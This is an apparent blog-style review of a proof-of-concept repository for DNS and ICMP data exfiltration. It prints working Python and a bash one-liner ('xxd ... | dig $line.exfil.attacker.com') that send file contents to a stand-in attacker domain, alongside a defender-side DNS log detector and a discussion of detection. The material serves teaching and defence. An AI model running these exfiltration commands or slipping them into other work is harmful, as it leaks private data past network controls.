Building Covert Channels: A Technical Dissection of DNS and ICMP Data Exfiltration

Hook

Every DNS query your application makes could be leaking gigabytes of data to an attacker, and your firewall wouldn't even blink. Welcome to the world of covert channels, where legitimate protocols become data highways.

Context

Data exfiltration—the unauthorized transfer of data from a compromised system—remains one of the most challenging problems in network security. Traditional perimeter defenses excel at blocking suspicious outbound connections, but they struggle with a fundamental dilemma: how do you distinguish malicious traffic from legitimate business operations when attackers use the same protocols your applications depend on?

This is where covert channels shine from an attacker's perspective. By embedding stolen data within DNS queries, ICMP ping packets, or even HTTP headers, adversaries can bypass firewalls that must allow these protocols for normal operations. The glennzw/exphil repository demonstrates exactly these techniques through minimalist proof-of-concept scripts. While the project itself is intentionally simple—focused on education rather than operational tooling—it provides an excellent window into the mechanics of data exfiltration and forces us to confront an uncomfortable truth: the protocols we trust most are often the easiest to abuse.

Technical Insight

System architecture (auto-generated diagram, rendered here as text): Target File -> Hex Encoder -> Chunk Generator -> DNS Query Builder (subdomain.attacker.com) or ICMP Packet Builder (ping packets with payload) -> attacker infrastructure: DNS Server (extract from query logs) or ICMP Listener (extract from packet payload) -> Data Reassembler (verify MD5 checksum) -> Reconstructed File.

The repository implements two classic exfiltration vectors: DNS query tunneling and ICMP payload embedding. Let's dissect both to understand what makes them effective and why defenders struggle to stop them.

The DNS exfiltration method is elegantly simple yet surprisingly capable. It works by encoding target file data as hexadecimal, then breaking it into chunks that become subdomains in DNS queries sent to an attacker-controlled nameserver. Here's a simplified version of the core logic:

import os

target_file = "secret.bin"  # path of the file to encode (placeholder)

# Encode file to hex and chunk it
with open(target_file, 'rb') as f:
    data = f.read()
    hex_data = data.hex()

# Split into chunks that fit in DNS labels (63 chars max)
chunk_size = 60
chunks = [hex_data[i:i+chunk_size] for i in range(0, len(hex_data), chunk_size)]

# Send each chunk as a DNS query
for idx, chunk in enumerate(chunks):
    # Format: chunk-index.total-chunks.data.attacker-domain.com
    query = f"{idx}.{len(chunks)}.{chunk}.exfil.attacker.com"
    os.system(f"nslookup {query}")

What makes this technique powerful is its abuse of a protocol that must exist for modern networks to function. DNS queries traverse virtually every firewall configuration because blocking them would break name resolution for legitimate applications. The attacker's nameserver receives these queries in its logs, extracts the embedded data from subdomain labels, and reassembles the original file. The repository includes MD5 checksum transmission to verify data integrity—a detail that separates toy demos from techniques actually used in penetration tests.

The ICMP exfiltration approach takes a different angle by stuffing data directly into ping packet payloads. Standard ping implementations already include arbitrary data (usually just padding), so modifying that payload to contain file chunks raises fewer red flags than you might expect:

import subprocess

target_file = "secret.bin"  # path of the file to encode (placeholder)

with open(target_file, 'rb') as f:
    while True:
        chunk = f.read(48)  # ICMP payload size
        if not chunk:
            break

        # Encode chunk as hex pattern for ping payload
        # (note: Linux iputils ping accepts at most 16 pattern bytes for -p,
        # so a 48-byte chunk is rejected there; shown as the simplified logic)
        hex_pattern = chunk.hex()
        subprocess.run([
            'ping', '-c', '1',
            '-p', hex_pattern,  # Custom payload pattern
            'attacker.com'
        ])

On the receiving end, the attacker runs packet capture filtering for ICMP traffic from the compromised host, extracts payload data from each packet, and reconstructs the file. This method is particularly insidious because ICMP is often allowed outbound for network diagnostics—blocking it would prevent troubleshooting tools from functioning.

Both techniques share a critical characteristic: they're stateless and asynchronous. Unlike traditional tunneling that establishes persistent connections, these methods fire-and-forget individual packets. This makes them resilient to network interruptions and harder to detect through connection analysis. A security analyst looking at netflow data might see dozens of DNS queries or pings, but without deep packet inspection, they appear completely benign.

The bash one-liner included for DNS exfiltration deserves special mention for its elegance:

xxd -p file.txt | while read line; do dig $line.exfil.attacker.com; done

This single command hexdumps a file, reads it line by line, and sends each line as a DNS query—demonstrating that sophisticated attacks don't require sophisticated code. An attacker gaining shell access needs only basic Unix utilities to begin exfiltrating data, no custom tooling required.

The architectural simplicity here is actually instructive. By stripping away encryption, error correction, and stealth features, these scripts expose the bare mechanics of covert channels. Understanding these fundamentals is crucial whether you're building detection systems, conducting security assessments, or architecting defenses.

Gotcha

The repository's documentation correctly labels these as proof-of-concept scripts, and you should take that designation seriously. Using these scripts in actual security engagements would be immediately detected by any competent blue team for several reasons.

First, the DNS exfiltration is absurdly noisy. Sending hundreds or thousands of DNS queries with long hexadecimal subdomains creates obvious patterns that DNS analytics tools flag instantly. Modern DNS security solutions baseline normal query behavior and alert on statistical anomalies—sudden spikes in query volume, excessive subdomain lengths, high entropy in domain names, and repeated queries to newly-registered domains all trigger alerts. These scripts do nothing to evade such detection. Real-world DNS exfiltration tools implement query throttling, domain generation algorithms, and encoding schemes that mimic legitimate subdomain patterns.

The ICMP method suffers similar issues: unusual ping frequencies, non-standard payload sizes, and high-entropy payload data all stand out. Additionally, neither method implements encryption, meaning any intercepted traffic reveals the exfiltrated data in plaintext (well, hex-encoded, which is trivially decoded).

For educational purposes or demonstrating attack concepts to stakeholders who need to understand threats, these scripts are perfect. For actual red team operations, they're dangerously inadequate and would likely get you caught before exfiltrating meaningful data volumes.
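The DNS-side heuristics listed above (long labels, hex-only labels, high subdomain entropy, query bursts to one domain) as a small detector run over query-log lines. This is an added defender-side example, not code from the exphil repository; the BIND-style log lines, the attacker.com zone and the thresholds are constructed for illustration and would need baselining against real traffic before use.

```python
import math
import re
from collections import Counter

# Constructed BIND-style query-log lines (sample data, not real traffic).
SAMPLE_LOG = """\
client 10.0.0.5#53412: query: www.example.com IN A +
client 10.0.0.7#40001: query: 0.3.48656c6c6f20776f726c642c207468697320697320612073656372657420.exfil.attacker.com IN A +
client 10.0.0.7#40002: query: 1.3.66696c652e20446f206e6f742073686172652e2054686973206c696e6520.exfil.attacker.com IN A +
client 10.0.0.7#40003: query: 2.3.697320746865206c617374206f6e652e0a.exfil.attacker.com IN A +
client 10.0.0.9#51000: query: cdn-a1b2.static.example.net IN A +
"""
LOG_RE = re.compile(r"client (?P<src>[\d.]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\S+)")
HEX_LABEL = re.compile(r"^[0-9a-f]+$")

def shannon_entropy(s):
    """Bits per character of s (0.0 for an empty string)."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0

def split_name(qname):
    """(subdomain labels, registered domain). Assumes the zone is the last two
    labels; a real deployment would consult the public-suffix list."""
    labels = qname.rstrip(".").lower().split(".")
    return labels[:-2], ".".join(labels[-2:])

def query_reasons(qname, max_label=30, min_hex=16, entropy_bits=3.0):
    """Per-query heuristics from the text: long labels, hex-only labels,
    high-entropy subdomain text. Thresholds are starting points, not tuned."""
    sub, _ = split_name(qname)
    reasons, text = [], "".join(sub)
    longest = max((len(l) for l in sub), default=0)
    if longest > max_label:
        reasons.append(f"label of {longest} chars exceeds {max_label}")
    if any(len(l) >= min_hex and HEX_LABEL.match(l) for l in sub):
        reasons.append("hex-only label")
    if len(text) >= min_hex and shannon_entropy(text) > entropy_bits:
        reasons.append(f"subdomain entropy {shannon_entropy(text):.2f} bits/char")
    return reasons

def analyze_log(log_text, volume_threshold=3):
    """Return (flagged {qname: reasons}, {(src, domain): count} at/over threshold)."""
    flagged, volume = {}, Counter()
    for m in LOG_RE.finditer(log_text):
        qname = m.group("qname")
        volume[(m.group("src"), split_name(qname)[1])] += 1
        if reasons := query_reasons(qname):
            flagged[qname] = reasons
    return flagged, {k: v for k, v in volume.items() if v >= volume_threshold}
```

The volume counter is what catches a throttled sender that keeps labels short: the per-query checks look at shape, the counter looks at how often one client talks to one zone.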

Verdict

Use if: You're building detection rules and need canonical examples of exfiltration techniques to test against; you're teaching security concepts and want minimal code that clearly demonstrates covert channel mechanics; or you're conducting a basic security assessment where demonstrating the vulnerability concept matters more than evading detection.

Use if: You're a blue team member who wants to understand what attack patterns to look for in DNS logs and ICMP traffic.

Skip if: You need operational red team tooling—these scripts lack the stealth, error handling, and encryption required for realistic engagements.

Skip if: You're looking for high-throughput data tunneling solutions; the performance here is abysmal by design.

Skip if: You want something you can deploy without modification; treat this as reference material and a starting point for building more sophisticated tools, not as finished products.

For actual security testing, graduate to dnscat2, Cobalt Strike's built-in exfiltration, or custom implementations with proper OPSEC considerations.
